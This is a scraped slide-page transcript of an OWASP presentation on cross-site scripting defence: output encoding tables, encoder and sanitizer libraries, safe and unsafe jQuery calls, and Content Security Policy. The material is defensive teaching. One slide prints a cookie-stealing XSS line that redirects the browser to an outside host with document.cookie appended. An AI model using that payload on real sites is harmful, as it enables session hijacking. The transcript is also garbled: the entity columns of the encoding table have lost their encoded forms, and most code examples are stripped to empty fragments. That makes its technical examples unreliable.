The OWASP Foundation Cross Site Scripting JavaScript Injection Contextual Output Encoding.

Slides:

Advertisements

Similar presentations

Past, Present and Future By Eoin Keary and Jim Manico

Advertisements

Appeared in 30 th IEEE Symposium on Security and Privacy, May Authors: Mike Ter Louw and V.N. Venkatakrishnan Dept. of Computer Science: University.

Past, Present and Future

March 2012 Top Ten Controls v4.2 Jim Manico and Eoin Keary Page 1 Top 10 Web Security Controls.

0 The Past, Present and Future of XSS Defense Jim Manico 2011 OWASP Brussels.

Tutorial 6 Creating a Web Form

Top 10 Defenses for Website Security Jim Manico VP of Security Architecture July 2012.

Top 10 Defenses for Website Security Jim Manico VP Security Architecture.

1 Page © 2012 WhiteHat Security, Inc. 1 Top 10 Defenses for Website Security Jim Manico VP of Security Architecture June 2012.

The XSS Files Find, Exploit, and Eliminate. Josh Little Security Engineer at global vertical market business intelligence company. 9 years in application.

Session 6: HTML 2 - Content Design J0394 – Perancangan Situs Web Program Studi Manajemen Universitas Bina Nusantara.

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007.

An Evaluation of the Google Chrome Extension Security Architecture

HTML – HyperText Markup Language. What is HTML ? the publishing language of the World Wide Web WWW – is a system of interlinked hypertext documents accessed.

XML To this point, we’ve pretty much ignored or brushed over the use of xml What is xml? – xml is eXtensible Markup Language – it is a metalanguage for.

Server-Side vs. Client-Side Scripting Languages

IS 360 Course Introduction. Slide 2 What you will Learn (1) The role of Web servers and clients How to create HTML, XHTML, and HTML 5 pages suitable for.

Unit 2, cont. September 14 HTML,Validating your pages, Publishing your site.

Creating a Well-Formed Valid Document. 2 Objectives Introducing XHTML Creating a Well-Formed Document Creating a Valid Document Creating an XHTML Document.

Session 2 Tables and forms in HTML Adapted by Sophie Peter from original document by Charlie Foulkes.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

HTML. Goals How to use the Komodo editor HTML coding and testing Basic HTML tags List and Images Tables and Links At least 2 pages and navigation

Softsmith Infotech HTML. Softsmith Infotech HTML Introduction Creation Tags Text List Image Background Link Table Frames Forms.

Web Programming Language Dr. Ken Cosh Week 1 (Introduction)

Web Development & Design Foundations with XHTML Chapter 9 Key Concepts.

Top Ten Proactive Web Application Defenses Top Five Proactive Mobile Controls.

HTML. Goals How to use the Komodo editor HTML coding and testing – List and Images – Tables and Links – At least 2 pages and navigation –

1 Web Developer & Design Foundations with XHTML Chapter 6 Key Concepts.

CSS Class 6 Make image into a button Create button with button element Group related form elements Control tab order Process form data.

JavaScript & jQuery the missing manual Chapter 11

+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.

XP Tutorial 9New Perspectives on Creating Web Pages with HTML, XHTML, and XML 1 Working with XHTML Creating a Well-Formed Valid Document Tutorial 9.

BLUEPRINT: Robust Prevention of Cross-site Scripting Attacks for Existing Browsers Mike Ter Louw, V.N. Venkatakrishnan University of Illinois at Chicago.

November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University

Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

CNIT 133 Interactive Web Pags – JavaScript and AJAX JavaScript Environment.

March 2012 Top Ten Controls v4.1 Jim Manico and Eoin Keary Page 1 Top 10 Web Security Controls.

Web Technologies COMP6115 Session 2: Planning, Designing, Constructing and Testing Static Web Sites Dr. Paul Walcott Department of Computer Science, Mathematics.

1 JavaScript in Context. Server-Side Programming.

Cross Site Integration “mashups” cross site scripting.

Javascript II DOM & JSON. In an effort to create increasingly interactive experiences on the web, programmers wanted access to the functionality of browsers.

Introduction To Web Application Security in PHP. Security is Big And Often Difficult PHP doesn’t make it any easier.

Web Development & Design Foundations with XHTML Chapter 9 Key Concepts.

XHTML1-1 Extensible HyperText Markup Language (XHTML) Part 2 Xingquan (Hill) Zhu

Introduction HTML (Hypertext Markup Language) is used to create document on the World Wide Web. HTML is not a programming language, it is a markup language.

Building Secure Web Applications With ASP.Net MVC.

1 Introduction to XML XML stands for Extensible Markup Language. Because it is extensible, XML has been used to create a wide variety of different markup.

JSON and A Comparison of Scripts. JSON: JavaScript Object Notation Based on a subset of the JavaScript Programming Language provides a standardized data.

HTML Form Widgets. Review: HTML Forms HTML forms are used to create web pages that accept user input Forms allow the user to communicate information back.

University of Central Florida The Postman Always Rings Twice: Attacking & Defending postMessage in HTML5 Websites Ankur Verma University of Central Florida,

HTML (Hyper Text Markup Language) Lecture II. Review Writing HTML files for web pages – efficient compact – fundamental. Text files with htm extension.

 Previous lessons have focused on client-side scripts  Programs embedded in the page’s HTML code  Can also execute scripts on the server  Server-side.

 Web pages originally static  Page is delivered exactly as stored on server  Same information displayed for all users, from all contexts  Dynamic.

Web Programming Introduction to Web Technology HTML & Dynamic web content.

AJAX and REST. Slide 2 What is AJAX? It’s an acronym for Asynchronous JavaScript and XML Although requests need not be asynchronous It’s not really a.

JQUERY AND AJAX

Tutorial 6 Creating a Web Form

The OWASP Foundation OWASP XSS Remediation Cassia Martin Romain Gaucher April 7 th, 2011.

SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.

An Introduction to Web Application Security

Web Application Vulnerabilities, Detection Mechanisms, and Defenses

Example – SQL Injection

The Past, Present and Future of XSS Defense

Haritha Dasari Josue Balandrano Coronel -

WWW安全國立暨南國際大學資訊管理學系陳彥錚.

Lecture 14: JSON and Web SERVICES

Mike Ter Louw, V.N. Venkatakrishnan University of Illinois at Chicago

Presentation transcript:

The OWASP Foundation Cross Site Scripting JavaScript Injection Contextual Output Encoding

The OWASP Foundation <

The OWASP Foundation <

The OWASP Foundation Encoding Output Safe ways to represent dangerous characters in a web page CharactersDecimalHexadecimal HTML Character Set Unicode " (double quotation marks) """\u0022 ' (single quotation mark) '''\u0027 & (ampersand)&&&\u0026 < (less than)<<<\u003c > (greater than) >>>\u003e

The OWASP Foundation XSS Attack Payloads –Session Hijacking –Site Defacement –Network Scanning –Undermining CSRF Defenses –Site Redirection/Phishing –Load of Remotely Hosted Scripts –Data Theft –Keystroke Logging –Attackers using XSS more frequently

The OWASP Foundation window.location=‘ iljim.com/unc/data=‘ + document.cookie; document.body.innerHTML=‘ EOIN IS COOL ’; Anatomy of a XSS Attack

The OWASP Foundation XSS Defense by Data Type and Context Data TypeContextDefense StringHTML BodyHTML Entity Encode StringHTML AttributeMinimal Attribute Encoding StringGET ParameterURL Encoding StringUntrusted URLURL Validation, avoid javascript: URLs, Attribute encoding, safe URL verification StringCSSStrict structural validation, CSS Hex encoding, good design HTMLHTML BodyHTML Validation (JSoup, AntiSamy, HTML Sanitizer) AnyDOMDOM XSS Cheat Sheet Untrusted JavaScriptAnySandboxing JSONClient Parse TimeJSON.parse() or json2.js Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width

The OWASP Foundation OWASP Java Encoder Project No third party libraries or configuration necessary. This code was designed for high-availability/high- performance encoding functionality. Simple drop-in encoding functionality Redesigned for performance More complete API (uri and uri component encoding, etc) in some regards. This is a Java 1.5 project. Will be the default encoder in the next revision of ESAPI. Last updated February 14, 2013 (version 1.1)

The OWASP Foundation The Problem Web Page built in Java JSP is vulnerable to XSS The Solution " /> " /> var msg = " "; alert(msg); ');">click me " /> " /> var msg = " "; alert(msg); ');">click me

The OWASP Foundation Title:

The OWASP Foundation <input type="text" name="data" value=" " /> <input type="text" name="data" value= />

The OWASP Foundation <a href="/search?value= &order=1#top"> <a href=" ">

The OWASP Foundation "> Encode.forHtmlContext(untrustedURL)

The OWASP Foundation <button onclick="alert(' ');"> click me <button onclick="alert(' ');">click me var msg = " "; alert(msg);

The OWASP Foundation <div style="background: url(' ');"> background-color:' ';

The OWASP Foundation Other Encoding Libraries Ruby on Rails Reform Project Java,.NET v1/v2, PHP, Python, Perl, JavaScript, Classic ASP ESAPI PHP.NET, Python, Classic ASP, Cold Fusion API.NET AntiXSS Library

The OWASP Foundation Nested Contexts Best to avoid: an element attribute calling a Javascript function etc - parsing chains ')" >An error occurred.... Here we have a HTML attribute(onClick) and within a nested Javascript function call (showError). Parsing order: 1: HTML decode the contents of the onclick attribute. 2: When onClick is selected: Javascript Parsing of showError So we have 2 contexts here...HTML and Javascript (2 browser parsers).

The OWASP Foundation We need to apply "layered" encoding in the RIGHT order: 1) JavaScript encode 2) HTML Attribute Encode so it "unwinds" properly and is not vulnerable. ')))" >An error occurred....

The OWASP Foundation OWASP HTML Sanitizer Project HTML Sanitizer written in Java which lets you include HTML authored by third-parties in your web application while protecting against XSS. This code was written with security best practices in mind, has an extensive test suite, and has undergone adversarial security review sanitizer/wiki/AttackReviewGroundRules. sanitizer/wiki/AttackReviewGroundRules Very easy to use. It allows for simple programmatic POSITIVE policy configuration (see below). No XML config. Actively maintained by Mike Samuel from Google's AppSec team! This is code from the Caja project that was donated by Google. It is rather high performance and low memory utilization.

The OWASP Foundation

The OWASP Foundation Solving Real World Problems with the OWASP HTML Sanitizer Project The Problem Web Page is vulnerable to XSS because of untrusted HTML The Solution PolicyFactory policy = new HtmlPolicyBuilder().allowElements("a").allowUrlProtocols("https").allowAttributes("href").onElements("a").requireRelNofollowOnLinks().build(); String safeHTML = policy.sanitize(untrustedHTML); PolicyFactory policy = new HtmlPolicyBuilder().allowElements("a").allowUrlProtocols("https").allowAttributes("href").onElements("a").requireRelNofollowOnLinks().build(); String safeHTML = policy.sanitize(untrustedHTML);

The OWASP Foundation OWASP JSON Sanitizer Project Given JSON-like content, converts it to valid JSON. This can be attached at either end of a data-pipeline to help satisfy Postel's principle: Be conservative in what you do, be liberal in what you accept from others. Applied to JSON-like content from others, it will produce well-formed JSON that should satisfy any parser you use. Applied to your output before you send, it will coerce minor mistakes in encoding and make it easier to embed your JSON in HTML and XML.

The OWASP Foundation Solving Real World Problems with the OWASP JSON Sanitizer Project The Problem Web Page is vulnerable to XSS because of parsing of untrusted JSON incorrectly The Solution JSON Sanitizer can help with two use cases. 1)Sanitizing untrusted JSON on the server that is submitted from the browser in standard AJAX communication 2)Sanitizing potentially untrusted JSON server-side before sending it to the browser. The output is a valid Javascript expression, so can be parsed by Javascript's eval or by JSON.parse. JSON Sanitizer can help with two use cases. 1)Sanitizing untrusted JSON on the server that is submitted from the browser in standard AJAX communication 2)Sanitizing potentially untrusted JSON server-side before sending it to the browser. The output is a valid Javascript expression, so can be parsed by Javascript's eval or by JSON.parse.

The OWASP Foundation DOM-Based XSS Defense Untrusted data should only be treated as displayable text JavaScript encode and delimit untrusted data as quoted strings Use safe API’s like document.createElement("…"), element.setAttribute("…","value"), element.appendChild(…) and $(‘#element’).text(…); to build dynamic interfaces Avoid use of HTML rendering methods Avoid sending any untrusted data to the JS methods that have a code execution context likeeval(..), setTimeout(..), onclick(..), onblur(..).

The OWASP Foundation SAFE use of JQuery $(‘#element’).text(UNTRUSTED DATA); UNSAFE use of JQuery $(‘#element’).html(UNTRUSTED DATA);

The OWASP Foundation 26 jQuery methods that directly update DOM or can execute JavaScript $() or jQuery().attr().add().css().after().html().animate().insertAfter().append().insertBefore().appendTo()Note:.text() updates DOM, but is safe. Dangerous jQuery Data Types CSSSome Attribute Settings HTMLURL (Potential Redirect) jQuery methods that accept URLs to potentially unsafe content jQuery.ajax()jQuery.post() jQuery.get()load() jQuery.getScript()

The OWASP Foundation Contextual encoding is a crucial technique needed to stop all types of XSS jqencoder is a jQuery plugin that allows developers to do contextual encoding in JavaScript to stop DOM-based XSS  tags/security tags/security  $('#element').encode('html', cdata); JQuery Encoding with JQencoder

The OWASP Foundation Content Security Policy Anti-XSS W3C standard Content Security Policy latest release version Must move all inline script and style into external scripts Add the X-Content-Security-Policy response header to instruct the browser that CSP is in use -Firefox/IE10PR: X-Content-Security-Policy -Chrome Experimental: X-WebKit-CSP -Content-Security-Policy-Report-Only Define a policy for the site regarding loading of content

The OWASP Foundation Get rid of XSS, eh? A script-src directive that doesn‘t contain ‘ unsafe-inline ’ eliminates a huge class of cross site scripting I WILL NOT WRITE INLINE JAVASCRIPT

The OWASP Foundation Real world CSP in action

The OWASP Foundation What does this report look like? { "csp-report"=> { "document-uri"=>" "referrer"=>"", "blocked-uri"=>"ws://localhost:35729/livereload", "violated-directive"=>"xhr-src ws://localhost.twitter.com:*" }

The OWASP Foundation { "csp-report"=> { "document-uri"=>" "referrer"=>"", "blocked-uri"=>"self", "violated-directive"=>"inline script base restriction", "source-file"=>" "script-sample"=>"alert(1)", "line-number"=>81 } What does this report look like?